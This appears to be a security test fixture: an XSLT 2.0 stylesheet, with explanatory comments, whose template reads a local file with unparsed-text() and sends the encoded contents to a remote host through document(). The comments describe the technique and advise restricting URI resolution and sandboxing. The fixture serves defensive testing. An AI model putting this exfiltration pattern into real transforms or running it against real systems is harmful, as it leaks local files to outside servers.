<!--
  Security test fixture: an XSLT 2.0 stylesheet showing that a transform can
  read a local file and disclose it through an outbound request.
  The single template combines unparsed-text() (local read) with document()
  (remote fetch). A processor that resolves both URIs without restriction
  therefore sends the file's contents to the host named in the URL.
  Defensive takeaway: a stylesheet is code. When it comes from an untrusted
  source, run it with document() and unparsed-text() resolution restricted
  (refuse file: URIs and hosts that are not allowlisted), or in a sandbox
  that has no file-system or network access.
-->
<xsl:stylesheet version="2.0"
  xmlns:xsl="http://www.w3.org/1999/XSL/Transform" 
  xmlns="http://www.w3.org/1999/xhtml" 
  xmlns:html="http://www.w3.org/1999/xhtml" 
  exclude-result-prefixes="html">

<!-- Serialise the result as indented UTF-8 XML and keep the XML declaration -->
<xsl:output method="xml" 
  indent="yes"
  omit-xml-declaration="no" 
  encoding="utf-8"  />

  <!-- Matches the document root, so it fires once for any input document;
       nothing from the input is read, the output depends only on the two
       URIs hard-coded in the select expression below. -->
  <xsl:template match="/">
    <!-- The ex: prefix is declared here but not used anywhere in this file. -->
    <rdf:RDF  xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
              xmlns:ex="http://example.org/test#">

<!-- One description holding a single rdf:value.
     NOTE(review): the original comment called this "the triple whose subject
     is the input document", but rdf:Description has no rdf:about attribute
     here; confirm whether rdf:about="" was intended. -->
      <rdf:Description >
          <!-- The select expression is evaluated inside-out:
                 1. unparsed-text() reads file:///temp/local.txt as a string;
                 2. encode-for-uri() percent-encodes that string;
                 3. concat() appends it after '?' as the query string;
                 4. document() dereferences the resulting http: URL, which is
                    the step that carries the file contents off the host.
               xsl:value-of then writes the string value of whatever the
               server returned into rdf:value, after the literal text.
               What to watch for on the processing host: reads of local files
               by the XSLT engine and outbound HTTP requests with long,
               percent-encoded query strings. -->
          <rdf:value>The contents of a local file are sent to a server
as the value of the query string. The attacker can then read
the local file from the server logs.
<xsl:value-of select="document(
               concat( 'http://www.w3.org/?',
          encode-for-uri(
      unparsed-text('file:///temp/local.txt') ) ) )" />
           </rdf:value>
      </rdf:Description>
    </rdf:RDF>
  </xsl:template>
</xsl:stylesheet>

